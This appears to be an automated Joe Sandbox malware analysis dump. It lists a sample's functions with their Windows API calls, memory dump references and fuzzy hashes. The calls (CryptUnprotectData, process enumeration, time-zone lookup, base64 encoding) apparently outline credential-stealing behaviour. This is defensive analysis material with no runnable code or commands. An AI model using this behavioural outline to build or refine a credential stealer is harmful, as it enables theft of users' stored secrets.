Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 08432a3af47bcb0d8b836a5428c458421e21261af55b0a65a92fdd1b8066814e
Instruction ID: db15de6f2de7e82660c1aa192e6ef30aa4bdb5e6cacb506bf4eaaa3e7014959d
Opcode Fuzzy Hash: 08432a3af47bcb0d8b836a5428c458421e21261af55b0a65a92fdd1b8066814e
Instruction Fuzzy Hash: ED21EBB5D04218ABCF14EFE4E8459EEB7B9FF48300F04852EE406B7254EB359608CB64

Function 00E172A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E172AD
RtlAllocateHeap.NTDLL(00000000), ref: 00E172B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E172E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E17304
LocalFree.KERNEL32(?), ref: 00E1730E

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 56195aecd9385a9ef4894015d328b4aa0f1d909ac80ffd507759868965ede2f4
Instruction ID: 29b58956db3be49506553f61c43a12752ea4fd0bfdfe689ec924fd3557915576
Opcode Fuzzy Hash: 56195aecd9385a9ef4894015d328b4aa0f1d909ac80ffd507759868965ede2f4
Instruction Fuzzy Hash: 67015275A40308BBDB10DFE4CC46F9D77B8AB44B00F104048FB45BF2C4C6B1AA408B94

Function 00E29790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E297AE
Process32First.KERNEL32(00E30ACE,00000128), ref: 00E297C2
Process32Next.KERNEL32(00E30ACE,00000128), ref: 00E297D7
StrCmpCA.SHLWAPI(?,00000000), ref: 00E297EC
CloseHandle.KERNEL32(00E30ACE), ref: 00E2980A

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 3f60bbb9820c744efbb9f5cfbdbfce4a0dd174ec5c1e1ec93dedab525843d95a
Instruction ID: deef5040bf569b3fceb1b5e7fe8709773a6e48e1026d531a8016af7efcb1926c
Opcode Fuzzy Hash: 3f60bbb9820c744efbb9f5cfbdbfce4a0dd174ec5c1e1ec93dedab525843d95a
Instruction Fuzzy Hash: A6015E75A00218EBDB24DFA5D944BDDB7F8BB08700F0451C8E509AB240E7759B40CF90

Function 00E34573 Relevance: 7.3, Strings: 2, Instructions: 4816COMMON

Download Yara Rule

Strings

<7\h, xrefs: 00E34752
huzx, xrefs: 00E348F0

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: <7\h$huzx
API String ID: 0-2989614873
Opcode ID: 5d827187b9bba1c7b975ac9aeefe0377cb5bc0638ef51c527cb9f82b2d2ec383
Instruction ID: 069405ca84e5003a9c367b88094b33a3371b0aaea248d5b56ac166c3e4d4bea2
Opcode Fuzzy Hash: 5d827187b9bba1c7b975ac9aeefe0377cb5bc0638ef51c527cb9f82b2d2ec383
Instruction Fuzzy Hash: 4863427341EBD41EC727CB3047BA1517F66FA13310B1969CEC8C1AB6B3C690AA16E356

Function 0125FA81 Relevance: 6.7, Strings: 4, Instructions: 1685COMMON

Download Yara Rule

Strings

;.<, xrefs: 0125FB6F
a}k, xrefs: 0126067B
`>:, xrefs: 01260E63
7Hu>, xrefs: 01260C4D

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7Hu>$;.<$a}k$`>:
API String ID: 0-1210247093
Opcode ID: e119e2c615e01d708b7a082abaa2930f9645a5931ef31782ecf2c8404bc7316d
Instruction ID: 5437e2575a175ead8564755a3c0b1ad0dbd747ada8e8e3b030303d3cf8787bd7
Opcode Fuzzy Hash: e119e2c615e01d708b7a082abaa2930f9645a5931ef31782ecf2c8404bc7316d
Instruction Fuzzy Hash: 1AB22DF3A08204AFE3046E2DEC8567AFBE9EFD4720F1A863DE9C4C7744E53558058696

Function 012759B6 Relevance: 6.6, Strings: 4, Instructions: 1578COMMON

Download Yara Rule

Strings

__u, xrefs: 01275D2E
Y$r7, xrefs: 01276778
h?7, xrefs: 01275FA5
'Iv=, xrefs: 01275B8E

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'Iv=$Y$r7$__u$h?7
API String ID: 0-949193570
Opcode ID: fd75c9184ef9b7aeed74b808c5526722e4f10387cf604ac402adac29786c1650
Instruction ID: f3420fc6f660256d9f453bd25edf2e4c887d6f98fde64623d876346244a99ad9
Opcode Fuzzy Hash: fd75c9184ef9b7aeed74b808c5526722e4f10387cf604ac402adac29786c1650
Instruction Fuzzy Hash: 14B219F360C204AFE304AE2DEC8577ABBE5EF94720F16853DEAC4C7744EA3558058696

Function 00E29030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00E151D4,40000001,00000000,00000000,?,00E151D4), ref: 00E29050

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 12d417d9d380e42ec7eb29f19870a55ec69dabd26837430756c95f39ddbf4342
Instruction ID: 4e12da06ed6f6ae00da0737d9f323ac4971e7ded31a79a8eb4eb85d9172e794c
Opcode Fuzzy Hash: 12d417d9d380e42ec7eb29f19870a55ec69dabd26837430756c95f39ddbf4342
Instruction Fuzzy Hash: 75110674200218FFDF04CF55E894FAA37A9AF89714F10A448FA1A9B245D776E9418BA0

Function 00E27BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0099F1E8,00000000,?,00E30DF8,00000000,?,00000000,00000000), ref: 00E27BF3
RtlAllocateHeap.NTDLL(00000000), ref: 00E27BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0099F1E8,00000000,?,00E30DF8,00000000,?,00000000,00000000,?), ref: 00E27C0D
wsprintfA.USER32 ref: 00E27C47

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: fd9f0dcfcfc3b1bbe0e9119fbaa4b2e5cc8ba12fc16df7372f5a5fa3f6ad4c66
Instruction ID: ff5f920f7722236b224e8fe9c8e1f2d8d63be4ef918269f0035abae958d89148
Opcode Fuzzy Hash: fd9f0dcfcfc3b1bbe0e9119fbaa4b2e5cc8ba12fc16df7372f5a5fa3f6ad4c66
Instruction Fuzzy Hash: 6511A571E05228DBE720CB55DC45FA9BBB8F744711F1003D9F619A72C0D77419408B90

Function 00E23970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(00E2E120,00000000,00000001,00E2E110,00000000), ref: 00E239A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E23A00

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 9177645593a83dcd28f346e237a34f01b87c7553429798da466614dd951fe514
Instruction ID: 70b5675e87466c7b401c8ce80693e3b6bb010f48e62ca4b03fa24c626768c587
Opcode Fuzzy Hash: 9177645593a83dcd28f346e237a34f01b87c7553429798da466614dd951fe514
Instruction Fuzzy Hash: 5641F870A00A289FDB24DB58DC95F9BB7B5BB48702F4051D8E608EB2D0D7B1AE85CF50

Function 00E1A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
LocalFree.KERNEL32(?), ref: 00E1A323

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 3f6e983018796fd0ec435a93c40390eb83a006dc3d3ac18ee84efa887b21cd51
Instruction ID: eeee748977fc84ac36b2f4d5356a36099d80042b5a445e10b0f21d4807cedeb0
Opcode Fuzzy Hash: 3f6e983018796fd0ec435a93c40390eb83a006dc3d3ac18ee84efa887b21cd51
Instruction Fuzzy Hash: 7A11E8B8A00209DFCB04DFA5D985AAEB7B5FB88700F104559ED15AB350D730AE50CBA1

Function 0126167B Relevance: 4.1, Strings: 2, Instructions: 1629COMMON

Download Yara Rule

Strings

;?|o, xrefs: 0126179D
y,/, xrefs: 01262582

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ;?|o$y,/
API String ID: 0-1327669435
Opcode ID: dbb07e0aa50b34bbbeeb40f148141dd73152b73fa73b82c1a0ad07173ca6c6df
Instruction ID: 880702bc7de6963294fe3a00b9c60f31a008534593216657202b1e7e0d9e45bd
Opcode Fuzzy Hash: dbb07e0aa50b34bbbeeb40f148141dd73152b73fa73b82c1a0ad07173ca6c6df
Instruction Fuzzy Hash: A7B2F8F3608204AFE704AE2DEC8577AB7E9EFD4720F1A893DE6C4C3744E63558058696

Function 00E84BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON

Download Yara Rule

Strings

?, xrefs: 00E854D5
__ZN, xrefs: 00E84FDF

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?$__ZN
API String ID: 0-1427190319
Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
Instruction ID: ffa33492599a692c747ae1285b144cc7f8aacd9651c35b5594e3ab7ed69a86da
Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
